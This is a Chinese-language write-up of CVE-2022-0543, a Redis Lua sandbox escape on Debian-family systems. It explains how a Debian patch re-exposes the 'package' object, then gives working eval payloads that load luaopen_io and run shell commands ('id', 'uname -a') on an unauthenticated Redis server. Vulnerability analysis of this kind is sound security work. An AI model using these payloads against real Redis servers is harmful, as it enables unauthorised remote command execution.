0x00 背景
巴西研究员 Reginaldo Silva 于 2022 年 3 月 8 日公开披露 该漏洞,从他的博客得知 CVE-2022-0543 该 Redis 沙盒逃逸漏洞仅影响 Debian 系的 Linux 发行版本,并非 Redis 本身漏洞
0x01 条件
- 未授权访问或拿到账号密码
- 目标为Debian及其衍生版
0x02 原理
首先,redis一直有一个攻击面,就是在用户连接redis后,可以通过eval命令执行lua脚本.
但这个脚本跑在沙箱里,正常情况下无法执行命令,读取文件
本质是一个沙箱绕过漏洞
Ubuntu/Debian/CentOS等这些发行版本会在原始软件的基础上打一些补丁包
比如Debian给Redis打的补丁,增加了一个include
Debian 以及 Ubuntu 发行版的源在打包 Redis 时,不慎在 Lua 沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数,进而逃逸沙箱执行任意命令。
我们借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数,即可获得io库,再使用其执行命令。
作者提到不同系统下liblua5.1.so.0的路径可能不同
不能打红帽系有点鸡肋了
但目前 Debian 系作为服务器的情况也是较多
debian这个include的这段代码是在make的时候用shell脚本动态生成的:
debian/lua_libs_debian.c:
echo "// Automatically generated; do not edit." >$@
echo "luaLoadLib(lua, LUA_LOADLIBNAME, luaopen_package);" >>$@
set -e; for X in $(LUA_LIBS_DEBIAN_NAMES); do \
echo "if (luaL_dostring(lua, \"$$X = require('$$X');\"))" >>$@; \
echo " serverLog(LL_NOTICE, \"Error loading $$X library\");" >>$@; \
done
echo 'luaL_dostring(lua, "module = nil; require = nil;");' >>$@-> luaLoadLib(lua, LUA_LOADLIBNAME, luaopen_package);
在原始的redis源码里全局搜索一下这句话,可以发现这句话原本就是存在于源码里的,但是通过条件宏的方式注释掉了,将其注释掉的原因就是“for sandboxing concerns”。
但是Debian的这个补丁却把这句话重新写进去了,而这句话的意思就是向lua的上下文中注入一个package模块
我们可以利用这个模块,来加载任意Lua库,最终逃逸沙箱,执行任意命令:
local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res0x03 漏洞复现
搭建好的环境是redis 5.0.7,且存在未授权
payload
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("uname -a", "r"); local res = f:read("*a"); f:close(); return res' 0
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
